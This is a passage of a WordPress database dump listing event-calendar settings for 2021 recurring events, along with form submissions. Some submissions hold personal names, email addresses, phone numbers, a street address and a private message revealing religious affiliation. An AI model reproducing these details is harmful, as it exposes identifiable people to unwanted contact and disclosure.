s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-11-03\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Wed.1\";s:11:\"end_at_date\";s:10:\"10/17/2021\";s:3:\"end\";s:11:\"occurrences\";s:18:\"end_at_occurrences\";s:2:\"12\";}}'),(138617,264632,'mec_repeat','a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Wed.1\";s:11:\"end_at_date\";s:10:\"10/17/2021\";s:3:\"end\";s:11:\"occurrences\";s:18:\"end_at_occurrences\";s:2:\"12\";}'),(138618,264632,'mec_certain_weekdays','a:0:{}'),(138619,264632,'mec_allday','0'),(138620,264632,'one_occurrence','0'),(138621,264632,'mec_hide_time','0'),(138622,264632,'mec_hide_end_time','0'),(138623,264632,'mec_comment',''),(138624,264632,'mec_timezone','global'),(138625,264632,'mec_countdown_method','global'),(138626,264632,'mec_public','1'),(138627,264632,'mec_start_date','2021-11-03'),(138628,264632,'mec_start_time_hour','7'),(138629,264632,'mec_start_time_minutes','0'),(138630,264632,'mec_start_time_ampm','PM'),(138631,264632,'mec_start_day_seconds','68400'),(138632,264632,'mec_end_date','2021-11-03'),(138633,264632,'mec_end_time_hour','8'),(138634,264632,'mec_end_time_minutes','30'),(138635,264632,'mec_end_time_ampm','PM'),(138636,264632,'mec_end_day_seconds','73800'),(138637,264632,'mec_repeat_status','1'),(138638,264632,'mec_repeat_type','advanced'),(138639,264632,'mec_repeat_interval','1'),(138640,264632,'mec_repeat_end','occurrences'),(138641,264632,'mec_repeat_end_at_occurrences','11'),(138642,264632,'mec_repeat_end_at_date','2021-10-17'),(138643,264632,'mec_advanced_days','a:1:{i:0;s:5:\"Wed.1\";}'),(138644,264632,'mec_in_days',''),(138645,264632,'mec_not_in_days',''),(138646,264632,'mec_hourly_schedules','a:0:{}'),(138647,264632,'mec_booking','a:0:{}'),(138648,264632,'mec_tickets','a:0:{}'),(138649,264632,'mec_fees_global_inheritance','1'),(138650,264632,'mec_fees','a:0:{}'),(138651,264632,'mec_ticket_variations_global_inheritance','1'),(138652,264632,'mec_ticket_variations','a:0:{}'),(138653,264632,'mec_reg_fields_global_inheritance','1'),(138654,264632,'mec_reg_fields','a:0:{}'),(138655,264632,'mec_bfixed_fields','a:0:{}'),(138656,264632,'mec_op','a:0:{}'),(138657,264632,'mec_fields','a:0:{}'),(138658,264632,'mec_event_status','EventScheduled'),(138659,264632,'mec_moved_online_link',''),(138660,264632,'mec_cancelled_reason',''),(138661,264632,'mec_display_cancellation_reason_in_single_page',''),(138662,264632,'boldgrid_hide_page_title','0'),(138663,264633,'protect_children',''),(138664,264633,'protect_children',''),(138665,264633,'_edit_lock','1619292390:2'),(138666,264633,'_edit_last','2'),(151765,266078,'mec_tickets','a:0:{}'),(138668,264633,'mec_color',''),(138669,264633,'mec_location_id','118'),(138670,264633,'mec_dont_show_map','0'),(138671,264633,'mec_organizer_id','1'),(138672,264633,'mec_read_more',''),(138673,264633,'mec_more_info',''),(138674,264633,'mec_more_info_title',''),(138675,264633,'mec_more_info_target','_self'),(138676,264633,'mec_cost',''),(138677,264633,'mec_currency','a:0:{}'),(138678,264633,'mec_additional_organizer_ids','a:0:{}'),(138679,264633,'mec_additional_location_ids','a:0:{}'),(138680,264633,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-05-11\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-05-11\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Tue.2\";s:3:\"end\";s:4:\"date\";s:11:\"end_at_date\";s:10:\"10/11/2021\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(138681,264633,'mec_repeat','a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Tue.2\";s:3:\"end\";s:4:\"date\";s:11:\"end_at_date\";s:10:\"10/11/2021\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(138682,264633,'mec_certain_weekdays','a:0:{}'),(138683,264633,'mec_allday','0'),(138684,264633,'one_occurrence','0'),(138685,264633,'mec_hide_time','0'),(138686,264633,'mec_hide_end_time','0'),(138687,264633,'mec_comment',''),(138688,264633,'mec_timezone','global'),(138689,264633,'mec_countdown_method','global'),(138690,264633,'mec_public','1'),(138691,264633,'mec_start_date','2021-05-11'),(138692,264633,'mec_start_time_hour','7'),(138693,264633,'mec_start_time_minutes','0'),(138694,264633,'mec_start_time_ampm','PM'),(138695,264633,'mec_start_day_seconds','68400'),(138696,264633,'mec_end_date','2021-05-11'),(138697,264633,'mec_end_time_hour','8'),(138698,264633,'mec_end_time_minutes','0'),(138699,264633,'mec_end_time_ampm','PM'),(138700,264633,'mec_end_day_seconds','72000'),(138701,264633,'mec_repeat_status','1'),(138702,264633,'mec_repeat_type','advanced'),(138703,264633,'mec_repeat_interval','1'),(138704,264633,'mec_repeat_end','date'),(138705,264633,'mec_repeat_end_at_occurrences','9'),(138706,264633,'mec_repeat_end_at_date','2021-10-11'),(138707,264633,'mec_advanced_days','a:1:{i:0;s:5:\"Tue.2\";}'),(138708,264633,'mec_in_days',''),(138709,264633,'mec_not_in_days',''),(138710,264633,'mec_hourly_schedules','a:0:{}'),(138711,264633,'mec_booking','a:0:{}'),(138712,264633,'mec_tickets','a:0:{}'),(138713,264633,'mec_fees_global_inheritance','1'),(138714,264633,'mec_fees','a:0:{}'),(138715,264633,'mec_ticket_variations_global_inheritance','1'),(138716,264633,'mec_ticket_variations','a:0:{}'),(138717,264633,'mec_reg_fields_global_inheritance','1'),(138718,264633,'mec_reg_fields','a:0:{}'),(138719,264633,'mec_bfixed_fields','a:0:{}'),(138720,264633,'mec_op','a:0:{}'),(138721,264633,'mec_fields','a:0:{}'),(138722,264633,'mec_event_status','EventScheduled'),(138723,264633,'mec_moved_online_link',''),(138724,264633,'mec_cancelled_reason',''),(138725,264633,'mec_display_cancellation_reason_in_single_page',''),(138726,264633,'boldgrid_hide_page_title','0'),(138727,264635,'protect_children',''),(138728,264635,'protect_children',''),(138729,264635,'_edit_lock','1619292579:2'),(138730,264635,'_edit_last','2'),(151764,266078,'mec_booking','a:0:{}'),(138732,264635,'mec_color',''),(138733,264635,'mec_location_id','118'),(138734,264635,'mec_dont_show_map','0'),(138735,264635,'mec_organizer_id','1'),(138736,264635,'mec_read_more',''),(138737,264635,'mec_more_info',''),(138738,264635,'mec_more_info_title',''),(138739,264635,'mec_more_info_target','_self'),(138740,264635,'mec_cost',''),(138741,264635,'mec_currency','a:0:{}'),(138742,264635,'mec_additional_organizer_ids','a:0:{}'),(138743,264635,'mec_additional_location_ids','a:0:{}'),(138744,264635,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-05-13\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-05-13\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Thu.2\";s:3:\"end\";s:4:\"date\";s:11:\"end_at_date\";s:10:\"10/17/2021\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(138745,264635,'mec_repeat','a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Thu.2\";s:3:\"end\";s:4:\"date\";s:11:\"end_at_date\";s:10:\"10/17/2021\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(138746,264635,'mec_certain_weekdays','a:0:{}'),(138747,264635,'mec_allday','0'),(138748,264635,'one_occurrence','0'),(138749,264635,'mec_hide_time','0'),(138750,264635,'mec_hide_end_time','0'),(138751,264635,'mec_comment',''),(138752,264635,'mec_timezone','global'),(138753,264635,'mec_countdown_method','global'),(138754,264635,'mec_public','1'),(138755,264635,'mec_start_date','2021-05-13'),(138756,264635,'mec_start_time_hour','7'),(138757,264635,'mec_start_time_minutes','0'),(138758,264635,'mec_start_time_ampm','PM'),(138759,264635,'mec_start_day_seconds','68400'),(138760,264635,'mec_end_date','2021-05-13'),(138761,264635,'mec_end_time_hour','8'),(138762,264635,'mec_end_time_minutes','30'),(138763,264635,'mec_end_time_ampm','PM'),(138764,264635,'mec_end_day_seconds','73800'),(138765,264635,'mec_repeat_status','1'),(138766,264635,'mec_repeat_type','advanced'),(138767,264635,'mec_repeat_interval','1'),(138768,264635,'mec_repeat_end','date'),(138769,264635,'mec_repeat_end_at_occurrences','9'),(138770,264635,'mec_repeat_end_at_date','2021-10-17'),(138771,264635,'mec_advanced_days','a:1:{i:0;s:5:\"Thu.2\";}'),(138772,264635,'mec_in_days',''),(138773,264635,'mec_not_in_days',''),(138774,264635,'mec_hourly_schedules','a:0:{}'),(138775,264635,'mec_booking','a:0:{}'),(138776,264635,'mec_tickets','a:0:{}'),(138777,264635,'mec_fees_global_inheritance','1'),(138778,264635,'mec_fees','a:0:{}'),(138779,264635,'mec_ticket_variations_global_inheritance','1'),(138780,264635,'mec_ticket_variations','a:0:{}'),(138781,264635,'mec_reg_fields_global_inheritance','1'),(138782,264635,'mec_reg_fields','a:0:{}'),(138783,264635,'mec_bfixed_fields','a:0:{}'),(138784,264635,'mec_op','a:0:{}'),(138785,264635,'mec_fields','a:0:{}'),(138786,264635,'mec_event_status','EventScheduled'),(138787,264635,'mec_moved_online_link',''),(138788,264635,'mec_cancelled_reason',''),(138789,264635,'mec_display_cancellation_reason_in_single_page',''),(138790,264635,'boldgrid_hide_page_title','0'),(144047,265214,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-07-14\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-07-14\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(144046,265214,'mec_end_day_seconds','72000'),(144045,265214,'mec_end_time_ampm','PM'),(144044,265214,'mec_end_time_minutes','0'),(144043,265214,'mec_end_time_hour','8'),(144042,265214,'mec_end_date','2021-07-14'),(144041,265214,'mec_start_day_seconds','68400'),(144040,265214,'mec_start_time_ampm','PM'),(144032,265214,'protect_children',''),(144033,265214,'mec_color',''),(144034,265214,'mec_location_id','119'),(144035,265214,'mec_dont_show_map','1'),(144036,265214,'mec_organizer_id','1'),(144037,265214,'mec_start_date','2021-07-14'),(144038,265214,'mec_start_time_hour','7'),(144039,265214,'mec_start_time_minutes','0'),(144028,265213,'_field_404','judyanneanderson28@gmail.com'),(144029,265213,'_form_id','44'),(144030,265213,'_seq_num','6'),(144031,265214,'protect_children',''),(144027,265213,'_field_403','Anderson'),(144026,265213,'_field_402','judy'),(144018,265210,'_seq_num','2'),(144017,265210,'_form_id','11'),(144016,265210,'_field_117','Hi Bonnie,\nMy husband Chris and I recently moved to Colorado Springs from NC.\nWe\'ve each had a pink slip for the 7th Initiation for a few months but wanted to wait until we moved to move forward.\nCan you please advise?\nMany Thanks in ECK,\nJane Taylor'),(144015,265210,'_field_116','ESA/Initiator-Bonnie Alexander-Reeves'),(144014,265210,'_field_113','Co Springs'),(144013,265210,'_field_112','(704) 728-9150'),(144012,265210,'_field_111','j.taylor8853@gmail.com'),(144011,265210,'_field_110','Taylor'),(144010,265210,'_field_109','Jane'),(144009,265209,'_seq_num','127'),(144008,265209,'_form_id','21'),(144007,265209,'_field_229','a:3:{i:0;s:16:\"Colorado Springs\";i:1;s:39:\"Central Colorado/ECK Temple in Colorado\";i:2;s:8:\"Loveland\";}'),(144006,265209,'_field_228','US'),(144005,265209,'_field_227','CO'),(144004,265209,'_field_226','j.taylor8853@gmail.com'),(144003,265209,'_field_225','Taylor'),(144002,265209,'_field_224','Jane'),(144001,265208,'_seq_num','126'),(144000,265208,'_form_id','21'),(144767,265263,'_field_448','jartzchongrh@live.com'),(144765,265263,'_field_446','Reid'),(144766,265263,'_field_447','Heassler'),(143999,265208,'_field_229','a:3:{i:0;s:16:\"Colorado Springs\";i:1;s:39:\"Central Colorado/ECK Temple in Colorado\";i:2;s:8:\"Loveland\";}'),(143998,265208,'_field_228','US'),(143997,265208,'_field_227','NC'),(138855,264637,'protect_children',''),(138856,264637,'protect_children',''),(138857,264637,'mec_color',''),(138858,264637,'mec_location_id','119'),(138859,264637,'mec_dont_show_map','1'),(138860,264637,'mec_organizer_id','1'),(138861,264637,'mec_start_date','2021-05-15'),(138862,264637,'mec_start_time_hour','1'),(138863,264637,'mec_start_time_minutes','0'),(138864,264637,'mec_start_time_ampm','PM'),(138865,264637,'mec_start_day_seconds','46800'),(138866,264637,'mec_end_date','2021-05-15'),(138867,264637,'mec_end_time_hour','2'),(138868,264637,'mec_end_time_minutes','0'),(138869,264637,'mec_end_time_ampm','PM'),(138870,264637,'mec_end_day_seconds','50400'),(138871,264637,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-05-15\";s:4:\"hour\";s:1:\"1\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-05-15\";s:4:\"hour\";s:1:\"2\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(138872,264637,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(138873,264637,'mec_certain_weekdays','a:0:{}'),(138874,264637,'mec_allday','0'),(138875,264637,'mec_hide_time','0'),(138876,264637,'mec_hide_end_time','0'),(138877,264637,'mec_comment',''),(138878,264637,'mec_repeat_status','0'),(138879,264637,'mec_repeat_type',''),(138880,264637,'mec_repeat_interval','1'),(138881,264637,'mec_repeat_end',''),(138882,264637,'mec_repeat_end_at_occurrences',''),(138883,264637,'mec_repeat_end_at_date',''),(138884,264637,'mec_advanced_days','a:0:{}'),(138885,264637,'mec_in_days',''),(138886,264637,'mec_not_in_days',''),(138887,264637,'mec_hourly_schedules','a:0:{}'),(138888,264637,'mec_booking','a:0:{}'),(138889,264637,'mec_tickets','a:0:{}'),(138890,264637,'mec_fees_global_inheritance','1'),(138891,264637,'mec_fees','a:0:{}'),(138892,264637,'mec_ticket_variations_global_inheritance','1'),(138893,264637,'mec_ticket_variations','a:0:{}'),(138894,264637,'mec_reg_fields_global_inheritance','1'),(138895,264637,'mec_reg_fields','a:0:{}'),(138896,264637,'mec_op','a:0:{}'),(138897,264637,'mec_event_date_submit','20210422154949'),(138898,264637,'_edit_lock','1620143112:2'),(138899,264637,'_edit_last','2'),(138900,264637,'mec_read_more',''),(138901,264637,'mec_more_info',''),(138902,264637,'mec_more_info_title',''),(138903,264637,'mec_more_info_target','_self'),(138904,264637,'mec_cost',''),(138905,264637,'mec_currency','a:0:{}'),(138906,264637,'mec_additional_organizer_ids','a:0:{}'),(138907,264637,'mec_additional_location_ids','a:0:{}'),(138908,264637,'one_occurrence','0'),(138909,264637,'mec_timezone','global'),(138910,264637,'mec_countdown_method','global'),(138911,264637,'mec_public','1'),(138912,264637,'mec_bfixed_fields','a:0:{}'),(138913,264637,'mec_fields','a:0:{}'),(138914,264637,'mec_event_status','EventScheduled'),(138915,264637,'mec_moved_online_link',''),(138916,264637,'mec_cancelled_reason',''),(138917,264637,'mec_display_cancellation_reason_in_single_page',''),(138918,264637,'_thumbnail_id','264127'),(138919,264639,'protect_children',''),(138920,264639,'protect_children',''),(138921,264639,'_edit_lock','1619293407:2'),(138922,264639,'_edit_last','2'),(138924,264639,'mec_color',''),(138925,264639,'mec_location_id','118'),(138926,264639,'mec_dont_show_map','0'),(138927,264639,'mec_organizer_id','1'),(138928,264639,'mec_read_more',''),(138929,264639,'mec_more_info',''),(138930,264639,'mec_more_info_title',''),(138931,264639,'mec_more_info_target','_self'),(138932,264639,'mec_cost',''),(138933,264639,'mec_currency','a:0:{}'),(138934,264639,'mec_additional_organizer_ids','a:0:{}'),(138935,264639,'mec_additional_location_ids','a:0:{}'),(138936,264639,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-05-18\";s:4:\"hour\";s:1:\"6\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-05-18\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Tue.3\";s:3:\"end\";s:4:\"date\";s:11:\"end_at_date\";s:10:\"10/17/2021\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(138937,264639,'mec_repeat','a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Tue.3\";s:3:\"end\";s:4:\"date\";s:11:\"end_at_date\";s:10:\"10/17/2021\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(138938,264639,'mec_certain_weekdays','a:0:{}'),(138939,264639,'mec_allday','0'),(138940,264639,'one_occurrence','0'),(138941,264639,'mec_hide_time','0'),(138942,264639,'mec_hide_end_time','0'),(138943,264639,'mec_comment',''),(138944,264639,'mec_timezone','global'),(138945,264639,'mec_countdown_method','global'),(138946,264639,'mec_public','1'),(138947,264639,'mec_start_date','2021-05-18'),(138948,264639,'mec_start_time_hour','6'),(138949,264639,'mec_start_time_minutes','0'),(138950,264639,'mec_start_time_ampm','PM'),(138951,264639,'mec_start_day_seconds','64800'),(138952,264639,'mec_end_date','2021-05-18'),(138953,264639,'mec_end_time_hour','7'),(138954,264639,'mec_end_time_minutes','0'),(138955,264639,'mec_end_time_ampm','PM'),(138956,264639,'mec_end_day_seconds','68400'),(138957,264639,'mec_repeat_status','1'),(138958,264639,'mec_repeat_type','advanced'),(138959,264639,'mec_repeat_interval','1'),(138960,264639,'mec_repeat_end','date'),(138961,264639,'mec_repeat_end_at_occurrences','9'),(138962,264639,'mec_repeat_end_at_date','2021-10-17'),(138963,264639,'mec_advanced_days','a:1:{i:0;s:5:\"Tue.3\";}'),(138964,264639,'mec_in_days',''),(138965,264639,'mec_not_in_days',''),(138966,264639,'mec_hourly_schedules','a:0:{}'),(138967,264639,'mec_booking','a:0:{}'),(138968,264639,'mec_tickets','a:0:{}'),(138969,264639,'mec_fees_global_inheritance','1'),(138970,264639,'mec_fees','a:0:{}'),(138971,264639,'mec_ticket_variations_global_inheritance','1'),(138972,264639,'mec_ticket_variations','a:0:{}'),(138973,264639,'mec_reg_fields_global_inheritance','1'),(138974,264639,'mec_reg_fields','a:0:{}'),(138975,264639,'mec_bfixed_fields','a:0:{}'),(138976,264639,'mec_op','a:0:{}'),(138977,264639,'mec_fields','a:0:{}'),(138978,264639,'mec_event_status','EventScheduled'),(138979,264639,'mec_moved_online_link',''),(138980,264639,'mec_cancelled_reason',''),(138981,264639,'mec_display_cancellation_reason_in_single_page',''),(138982,264639,'boldgrid_hide_page_title','0'),(138983,264640,'protect_children',''),(138984,264640,'protect_children',''),(138985,264640,'_edit_lock','1620612619:2'),(138986,264640,'_edit_last','2'),(151763,266078,'mec_hourly_schedules','a:0:{}'),(138988,264640,'mec_color',''),(138989,264640,'mec_location_id','118'),(138990,264640,'mec_dont_show_map','0'),(138991,264640,'mec_organizer_id','1'),(138992,264640,'mec_read_more',''),(138993,264640,'mec_more_info',''),(138994,264640,'mec_more_info_title',''),(138995,264640,'mec_more_info_target','_self'),(138996,264640,'mec_cost',''),(138997,264640,'mec_currency','a:0:{}'),(138998,264640,'mec_additional_organizer_ids','a:0:{}'),(138999,264640,'mec_additional_location_ids','a:0:{}'),(139000,264640,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-05-15\";s:4:\"hour\";s:1:\"4\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-05-15\";s:4:\"hour\";s:1:\"5\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Sat.3\";s:3:\"end\";s:4:\"date\";s:11:\"end_at_date\";s:10:\"10/15/2022\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(139001,264640,'mec_repeat','a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Sat.3\";s:3:\"end\";s:4:\"date\";s:11:\"end_at_date\";s:10:\"10/15/2022\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(139002,264640,'mec_certain_weekdays','a:0:{}'),(139003,264640,'mec_allday','0'),(139004,264640,'one_occurrence','0'),(139005,264640,'mec_hide_time','0'),(139006,264640,'mec_hide_end_time','0'),(139007,264640,'mec_comment',''),(139008,264640,'mec_timezone','global'),(139009,264640,'mec_countdown_method','global'),(139010,264640,'mec_public','1'),(139011,264640,'mec_start_date','2021-05-15'),(139012,264640,'mec_start_time_hour','4'),(139013,264640,'mec_start_time_minutes','0'),(139014,264640,'mec_start_time_ampm','PM'),(139015,264640,'mec_start_day_seconds','57600'),(139016,264640,'mec_end_date','2021-05-15'),(139017,264640,'mec_end_time_hour','5'),(139018,264640,'mec_end_time_minutes','0'),(139019,264640,'mec_end_time_ampm','PM'),(139020,264640,'mec_end_day_seconds','61200'),(139021,264640,'mec_repeat_status','1'),(139022,264640,'mec_repeat_type','advanced'),(139023,264640,'mec_repeat_interval','1'),(139024,264640,'mec_repeat_end','date'),(139025,264640,'mec_repeat_end_at_occurrences','9'),(139026,264640,'mec_repeat_end_at_date','2022-10-15'),(139027,264640,'mec_advanced_days','a:1:{i:0;s:5:\"Sat.3\";}'),(139028,264640,'mec_in_days',''),(139029,264640,'mec_not_in_days',''),(139030,264640,'mec_hourly_schedules','a:0:{}'),(139031,264640,'mec_booking','a:0:{}'),(139032,264640,'mec_tickets','a:0:{}'),(139033,264640,'mec_fees_global_inheritance','1'),(139034,264640,'mec_fees','a:0:{}'),(139035,264640,'mec_ticket_variations_global_inheritance','1'),(139036,264640,'mec_ticket_variations','a:0:{}'),(139037,264640,'mec_reg_fields_global_inheritance','1'),(139038,264640,'mec_reg_fields','a:0:{}'),(139039,264640,'mec_bfixed_fields','a:0:{}'),(139040,264640,'mec_op','a:0:{}'),(139041,264640,'mec_fields','a:0:{}'),(139042,264640,'mec_event_status','EventScheduled'),(139043,264640,'mec_moved_online_link',''),(139044,264640,'mec_cancelled_reason',''),(139045,264640,'mec_display_cancellation_reason_in_single_page',''),(139046,264640,'boldgrid_hide_page_title','0'),(144095,265215,'_wp_attached_file','2021/07/sunset-horizon-1.jpg'),(144094,265214,'_thumbnail_id','265215'),(144093,265214,'mec_display_cancellation_reason_in_single_page',''),(144092,265214,'mec_cancelled_reason',''),(144091,265214,'mec_moved_online_link',''),(144090,265214,'mec_event_status','EventScheduled'),(144089,265214,'mec_fields','a:0:{}'),(144088,265214,'mec_bfixed_fields','a:0:{}'),(144087,265214,'mec_public','1'),(144079,265214,'mec_more_info_target','_self'),(144080,265214,'mec_cost',''),(144081,265214,'mec_currency','a:0:{}'),(144082,265214,'mec_additional_organizer_ids','a:0:{}'),(144083,265214,'mec_additional_location_ids','a:0:{}'),(144084,265214,'one_occurrence','0'),(144085,265214,'mec_timezone','global'),(144086,265214,'mec_countdown_method','global'),(144075,265214,'_edit_last','2'),(144076,265214,'mec_read_more',''),(144077,265214,'mec_more_info',''),(144078,265214,'mec_more_info_title',''),(144074,265214,'_edit_lock','1625428738:2'),(144073,265214,'mec_event_date_submit','20210422154949'),(144072,265214,'mec_op','a:0:{}'),(144071,265214,'mec_reg_fields','a:0:{}'),(144070,265214,'mec_reg_fields_global_inheritance','1'),(144069,265214,'mec_ticket_variations','a:0:{}'),(144068,265214,'mec_ticket_variations_global_inheritance','1'),(144067,265214,'mec_fees','a:0:{}'),(144066,265214,'mec_fees_global_inheritance','1'),(144065,265214,'mec_tickets','a:0:{}'),(144064,265214,'mec_booking','a:0:{}'),(144063,265214,'mec_hourly_schedules','a:0:{}'),(144062,265214,'mec_not_in_days',''),(144061,265214,'mec_in_days',''),(144060,265214,'mec_advanced_days','a:0:{}'),(144059,265214,'mec_repeat_end_at_date',''),(144058,265214,'mec_repeat_end_at_occurrences',''),(144057,265214,'mec_repeat_end',''),(144056,265214,'mec_repeat_interval','1'),(144055,265214,'mec_repeat_type',''),(144054,265214,'mec_repeat_status','0'),(144053,265214,'mec_comment',''),(144052,265214,'mec_hide_end_time','0'),(144051,265214,'mec_hide_time','0'),(144050,265214,'mec_allday','0'),(144049,265214,'mec_certain_weekdays','a:0:{}'),(144048,265214,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(143996,265208,'_field_226','j.taylor8853@gmail.com'),(143976,265203,'_seq_num','74'),(143975,265203,'_form_id','13'),(143974,265203,'_field_138','Hello, my husband Chris and I have very recently moved to Colorado Springs from NC. We are looking forward to connecting with the ECK community in CO. Thank you!'),(143973,265203,'_field_137','ECK members relocated from NC'),(143972,265203,'_field_135','j.taylor8853@gmail.com'),(143963,265201,'_form_id','44'),(143964,265201,'_seq_num','4'),(143965,265202,'_field_402','Kathryn'),(143966,265202,'_field_403','Zarate'),(143967,265202,'_field_404','klg3667@gmail.com'),(143968,265202,'_form_id','44'),(143969,265202,'_seq_num','5'),(143970,265203,'_field_133','Jane  '),(143971,265203,'_field_134','Taylor'),(143960,265201,'_field_402','Brandon'),(143961,265201,'_field_403','Cooper'),(143962,265201,'_field_404','lamontbrandoncooper@gmail.com'),(143959,265199,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:52921;s:12:\"smushed-size\";i:51026;s:15:\"savings-percent\";d:3.5800000000000000710542735760100185871124267578125;}'),(143958,265199,'smush-info','The file was compressed from 51.68 KB to 49.83 KB saving 3.58 percent using WP-Optimize'),(143957,265199,'smush-complete','1'),(143956,265199,'original-file','2021/06/hand-reaching-1-updraft-pre-smush-original.jpg'),(143955,265198,'passster_protection_type','password'),(143954,265198,'passster_activate_protection',NULL),(143953,265198,'passster_activate_global_protection',NULL),(143761,265163,'_seq_num','12'),(143760,265163,'_form_id','4'),(143759,265163,'_field_39',''),(143758,265163,'_field_37','US'),(143757,265163,'_field_36','CO'),(143756,265163,'_field_35','Aurora'),(143755,265163,'_field_34','1690 Ensenada Way'),(143754,265163,'_field_33','arianepiriber@gmail.com'),(143753,265163,'_field_32','(720) 620-9417'),(143752,265163,'_field_31','Dokotho'),(143751,265163,'_field_30','Lilian'),(143750,265162,'_seq_num','6'),(143749,265162,'_form_id','48'),(139175,264644,'protect_children',''),(139176,264644,'popup_title','Our Spring Sale Has 